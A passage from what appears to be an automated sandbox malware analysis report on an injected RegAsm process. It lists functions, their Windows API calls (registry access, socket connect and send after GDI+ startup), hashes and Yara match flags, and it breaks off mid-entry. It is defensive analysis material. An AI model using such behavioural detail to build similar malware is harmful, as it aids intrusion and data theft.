                                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                          Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                          • RegQueryValueExA.KERNEL32 ref: 00413768
                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                          Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                          • RegQueryValueExA.KERNEL32 ref: 004135C2
                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                          Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                          • RegQueryValueExA.KERNEL32 ref: 00413565
                                          • RegCloseKey.KERNEL32(?), ref: 00413570
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                          Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                          • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID:
                                          • API String ID: 1818849710-0
                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                          Function 004187AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GdiplusStartupconnectsend
                                          • String ID: NG
                                          • API String ID: 1957403310-1651712548
                                          • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                          • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                          • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                          • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                          Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                          • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                          • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                          • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                          Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                          Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: ;p
                                          • API String ID: 176396367-2290485912
                                          • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                          • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                          Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                          • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                          • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                          • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                          Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                          Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                          Strings
                                          • InitializeCriticalSectionEx, xrefs: 00448B1F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx
                                          • API String ID: 2593887523-3084827643
                                          • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                          • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                          • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                          • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                          Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                          • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                          • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                          • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                          Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                          Strings
                                          • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime
                                          • API String ID: 2086374402-595813830
                                          • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                          • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                          • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                          • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                          Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                          Function 0041B80C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                          • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                                          • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                          • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                                          Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • try_get_function.LIBVCRUNTIME ref: 00438E29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: try_get_function
                                          • String ID: FlsAlloc
                                          • API String ID: 2742660187-671089009
                                          • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                          • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                          • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                          • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                          Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: try_get_function
                                          • String ID: FlsAlloc
                                          • API String ID: 2742660187-671089009
                                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                          Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                          Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                          • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                          Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                          Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                          • _free.LIBCMT ref: 0044F050
                                          • _free.LIBCMT ref: 0044F086
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                          Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
